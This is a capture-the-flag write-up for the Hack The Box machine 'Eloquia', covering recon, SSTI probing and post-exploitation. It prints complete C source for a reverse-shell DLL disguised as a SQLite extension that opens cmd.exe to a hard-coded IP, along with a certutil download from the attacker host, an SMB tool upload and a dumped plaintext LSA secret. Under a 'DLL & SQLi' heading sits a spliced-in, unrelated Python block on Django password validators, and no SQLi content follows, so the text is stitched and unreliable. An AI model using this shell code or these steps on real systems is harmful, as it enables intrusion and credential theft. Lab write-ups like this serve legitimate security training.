Eloquia
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# nmap 10.129.12.100 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 18:33 EST
Nmap scan report for 10.129.12.100
Host is up (0.22s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# nmap 10.129.12.100 -p80,5985 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-14 02:18 EST
Nmap scan report for eloquia.htb (10.129.12.100)
Host is up (0.080s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Eloquia
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.66 seconds
1.1.2. vhost
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://eloquia.htb -H "Host: FUZZ.eloquia.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://eloquia.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.eloquia.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 589 req/sec :: Duration: [0:00:36] :: Errors: 0 ::
1.1.3. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# dirsearch -u http://eloquia.htb/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/Eloquia/reports/http_eloquia.htb/__25-12-14_06-29-04.txt
Target: http://eloquia.htb/
[06:29:04] Starting:
[06:29:21] 301 - 0B - /about -> /about/
[06:29:22] 301 - 0B - /accounts/login -> /accounts/login/
[06:30:04] 301 - 0B - /contact -> /contact/
Task Completed
1.2. web
This is an experience-sharing platform.
1.2.1. Django
When registering an account, I entered an existing account name and a weak password, and the site returned the messages below.
These warnings frequently appear in the Django framework: they are produced by the framework's standard password validators (see the Django documentation page "Password management in Django").
The password is too similar to the email.
This password is too short. It must contain at least 8 characters.
This password is too common.
This password is entirely numeric.
The browser extension Wappalyzer also identifies this as a site built with the Django framework.
1.2.2. SSTI
I inserted {{7*7}} into the title, the body and a comment; the title and body are vulnerable to SSTI.
Note: to publish an article successfully you must upload a banner first, otherwise publishing fails.
1.2.3. DLL & SQLi
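As an added example (not code from the original post or from Django itself), here is a standalone reimplementation of Django's four default password validators, showing why all four messages above can be returned together: Django runs every validator and collects all failures rather than stopping at the first one. The common-password set is a constructed stand-in for Django's bundled list.

```python
import re
from difflib import SequenceMatcher
from typing import List

# Constructed stand-in for Django's bundled common-passwords list (~20k entries).
COMMON_PASSWORDS = {"password", "12345678", "qwerty", "123456", "1234", "letmein"}

MIN_LENGTH = 8          # MinimumLengthValidator default
MAX_SIMILARITY = 0.7    # UserAttributeSimilarityValidator default


def too_similar(password: str, attr_value: str, threshold: float = MAX_SIMILARITY) -> bool:
    """Mirror UserAttributeSimilarityValidator: compare the password against the
    whole attribute and each of its \\W-separated parts (e.g. the local part of
    an email), flagging it when difflib's quick_ratio reaches the threshold."""
    if not attr_value:
        return False
    value = attr_value.lower()
    parts = re.split(r"\W+", value) + [value]
    pw = password.lower()
    return any(SequenceMatcher(a=pw, b=p).quick_ratio() >= threshold for p in parts if p)


def validate_password(password: str, email: str = "") -> List[str]:
    """Run the four default validators and, like Django's validate_password(),
    return every failing message (an empty list means the password is accepted)."""
    errors = []
    if too_similar(password, email):
        errors.append("The password is too similar to the email.")
    if len(password) < MIN_LENGTH:
        errors.append(f"This password is too short. It must contain at least {MIN_LENGTH} characters.")
    if password.lower().strip() in COMMON_PASSWORDS:
        errors.append("This password is too common.")
    if password.isdigit():
        errors.append("This password is entirely numeric.")
    return errors


if __name__ == "__main__":
    # Constructed inputs: a weak password reusing the email's local part trips all four checks.
    for msg in validate_password("1234", "1234@eloquia.htb"):
        print(msg)
```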
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_api_routines sqlite3_api_routines;
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
__declspec(dllexport) int sqlite3_extension_init(
sqlite3 *db,
char **pzErrMsg,
const sqlite3_api_routines *pApi
) {
WSADATA wsaData;
SOCKET s;
struct sockaddr_in sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSAStartup(MAKEWORD(2,2), &wsaData);
s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr("192.168.1.100"); // ← CHANGE THIS!
sa.sin_port = htons(81);
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == 0) {
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = (HANDLE)s;
si.hStdOutput = (HANDLE)s;
si.hStdError = (HANDLE)s;
if (CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
closesocket(s);
WSACleanup();
return 0;
}
x86_64-w64-mingw32-gcc -shared -o shell2.dll shell2.c -lws2_32
2. Olivia.kat
2.1. Recon
*Evil-WinRM* PS C:\Users\Olivia.KAT\desktop> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 876
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 488
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1436
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2212
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 632
This is not an AD machine.
2.1.1. File upload
This user has very low privileges: certutil.exe cannot be run, and PowerShell is restricted to Constrained Language Mode, so the WinRM upload also fails.
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> upload winPEAS.bat
Info: Uploading /root/Desktop/htb/Eloquia/winPEAS.bat to C:\Users\Olivia.KAT\AppData\Local\Temp\winPEAS.bat
Error: Upload failed. Check filenames or paths: [WinRM::FS::Core::FileTransporter] Upload failed (exitcode: 0), but stderr present
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:51 char:12
+ return $ExecutionContext.SessionState.Path.GetUnresolvedProviderP ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
Cannot bind argument to parameter 'Path' because it is null.
At line:19 char:18
+ if(Test-Path $dst -PathType Container) {
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
Cannot bind argument to parameter 'Path' because it is null.
At line:24 char:41
+ chk_exists = ($exists = Test-Path $dst -PathType Leaf)
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> certutil -f -split -urlcache http://10.10.14.20/winPEAS.bat
Program 'certutil.exe' failed to run: Access is deniedAt line:1 char:1
+ certutil -f -split -urlcache http://10.10.14.20/winPEAS.bat
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ certutil -f -split -urlcache http://10.10.14.20/winPEAS.bat
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Here I use SMB to upload the file instead.
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# impacket-smbserver share ./ -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\public> net use \\10.10.14.20\share
The command completed successfully.
*Evil-WinRM* PS C:\tmp> copy \\10.10.14.20\share\winPEAS.bat $env:TEMP\winpeas.bat
*Evil-WinRM* PS C:\tmp> echo $env
*Evil-WinRM* PS C:\tmp> $env:TEMP
C:\Users\Olivia.KAT\AppData\Local\Temp
*Evil-WinRM* PS C:\tmp> cd C:\Users\Olivia.KAT\AppData\Local\Temp
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> dir
Directory: C:\Users\Olivia.KAT\AppData\Local\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/14/2025 12:06 AM 36950 winpeas.bat
2.1.2. DF
When I ran winPEAS I found that antivirus is also present.
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> .\win.bat
Program 'win.bat' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\win.bat
+ ~~~~~~~~~.
At line:1 char:1
+ .\win.bat
+ ~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
3. Hashes
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] _SC_eloquia.htb
(Unknown User):v3ryS0l!dP@sswd#1
[*] _SC_qooqle.htb
(Unknown User):v3ryS0l!dP@sswd#1
[*] Cleaning up...